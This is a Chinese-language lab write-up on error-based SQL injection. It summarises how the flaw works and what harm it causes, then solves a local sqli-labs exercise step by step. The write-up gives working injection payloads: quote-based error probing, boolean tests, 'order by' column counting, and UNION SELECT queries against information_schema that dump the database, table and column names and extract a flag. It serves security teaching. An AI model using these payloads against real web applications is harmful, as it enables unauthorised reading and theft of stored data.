SQL显错注入
SQL显错注入
sql注入原理:
sql注入漏洞是web层面最高危的漏洞之一,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
综上所述:sql注入漏洞的形成原因就是:用户输入的数据被SQL解释器执行。
SQL注入攻击的主要危害包括:
非法读取、篡改、添加、删除数据库中的数据;
数据库信息泄漏:数据库中存放的用户的隐私信息的泄露,攻击者盗取用户的各类敏感信息,获取利益。
网页篡改:通过修改数据库来修改网页上的内容。
数据库被恶意操作:数据库服务器被攻击,数据库的系统管理员帐户被窜改,攻击者私自添加或删除账号
网站被挂马,传播恶意软件:修改数据库一些字段的值,嵌入网马链接,进行挂马攻击;
服务器被远程控制,被安装后门。经由数据库服务器提供的操作系统支持,让黑客得以修改或控制操作系统。
破坏硬盘数据,瘫痪全系统。
靶场
首先判断注入点
?id=1’进行判断 测试报错
可以看到报错
用 and 1 = 1去测试:
发现回显正常
–+是注释
用 and 1 = 2 去测试:
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ and 1 = 2
回显示失败,说明存在注入点。
用order by 判断字段
Order by 4的时候报错
说明有3个字段
构造语句
?id=-1’ union select 1,2,3 --+
发现回显字段为2,3
爆数据库名
构造语句
?id=-1’ union select 1,2, database()
爆出数据库名为security
爆表名
使用过滤查询语句where 查看security数据库内的表
构造语句
?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘security’
看到有五个表
爆出表名 目测zkaq表内有我们想要的东西
爆列
构造语句
?id=-1’ union select 1, group_concat(column_name),3 from information_schema.columns where table_name = ‘zkaq’–+
看到我们想要的东西了!!!
查看我们的FLAG
构造语句
?id=-1’ union select 1,zkaq,flag from zkaq–+
得到Flag.